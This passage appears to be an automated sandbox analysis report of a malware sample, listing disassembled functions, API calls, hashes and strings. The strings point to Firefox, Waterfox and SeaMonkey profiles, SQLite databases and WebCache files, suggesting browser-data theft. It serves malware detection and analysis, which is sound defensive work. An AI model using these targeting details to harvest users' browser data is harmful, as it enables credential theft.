                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                            • String ID: Waterfox$Waterfox\Profiles
                                                            • API String ID: 4039892925-11920434
                                                            • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                            • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                            Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00403E50
                                                            • memset.MSVCRT ref: 00403E65
                                                            • memset.MSVCRT ref: 00403E7A
                                                            • memset.MSVCRT ref: 00403E8F
                                                            • memset.MSVCRT ref: 00403EA4
                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                            • memset.MSVCRT ref: 00403F6B
                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                            • API String ID: 4039892925-2068335096
                                                            • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                            • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                            Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00403FE1
                                                            • memset.MSVCRT ref: 00403FF6
                                                            • memset.MSVCRT ref: 0040400B
                                                            • memset.MSVCRT ref: 00404020
                                                            • memset.MSVCRT ref: 00404035
                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                            • memset.MSVCRT ref: 004040FC
                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                            • API String ID: 4039892925-3369679110
                                                            • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                            • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                            Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                            • API String ID: 3510742995-2641926074
                                                            • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                            Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                            • memset.MSVCRT ref: 004033B7
                                                            • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                            • wcscmp.MSVCRT ref: 004033FC
                                                            • _wcsicmp.MSVCRT ref: 00403439
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                            • String ID: $0.@
                                                            • API String ID: 2758756878-1896041820
                                                            • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                            • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                            Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                            • String ID:
                                                            • API String ID: 2941347001-0
                                                            • Opcode ID: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                            • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                            • Opcode Fuzzy Hash: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                            • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                            Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00403C09
                                                            • memset.MSVCRT ref: 00403C1E
                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                            • wcscat.MSVCRT ref: 00403C47
                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                            • wcscat.MSVCRT ref: 00403C70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                            • API String ID: 1534475566-1174173950
                                                            • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                            • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                            • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                            • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                            Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                            • memset.MSVCRT ref: 00414C87
                                                            • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                            • wcscpy.MSVCRT ref: 00414CFC
                                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                            Strings
                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                            • API String ID: 71295984-2036018995
                                                            • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                            • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                            Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wcschr.MSVCRT ref: 00414458
                                                            • _snwprintf.MSVCRT ref: 0041447D
                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                            • String ID: "%s"
                                                            • API String ID: 1343145685-3297466227
                                                            • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                            • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                            Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProcessTimes
                                                            • String ID: GetProcessTimes$kernel32.dll
                                                            • API String ID: 1714573020-3385500049
                                                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                            Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 004087D6
                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                            • memset.MSVCRT ref: 00408828
                                                            • memset.MSVCRT ref: 00408840
                                                            • memset.MSVCRT ref: 00408858
                                                            • memset.MSVCRT ref: 00408870
                                                            • memset.MSVCRT ref: 00408888
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                            • String ID:
                                                            • API String ID: 2911713577-0
                                                            • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                            • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                            Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcmp
                                                            • String ID: @ $SQLite format 3
                                                            • API String ID: 1475443563-3708268960
                                                            • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                            • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                            Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmpqsort
                                                            • String ID: /nosort$/sort
                                                            • API String ID: 1579243037-1578091866
                                                            • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                            • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                            Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040E60F
                                                            • memset.MSVCRT ref: 0040E629
                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                            Strings
                                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                            • API String ID: 2887208581-2114579845
                                                            • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                            • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                            Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Resource$FindLoadLockSizeof
                                                            • String ID:
                                                            • API String ID: 3473537107-0
                                                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                            Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(02400048), ref: 0044DF01
                                                            • ??3@YAXPAX@Z.MSVCRT(02410050), ref: 0044DF11
                                                            • ??3@YAXPAX@Z.MSVCRT(00B56E78), ref: 0044DF21
                                                            • ??3@YAXPAX@Z.MSVCRT(02410458), ref: 0044DF31
                                                            Memory Dump Source
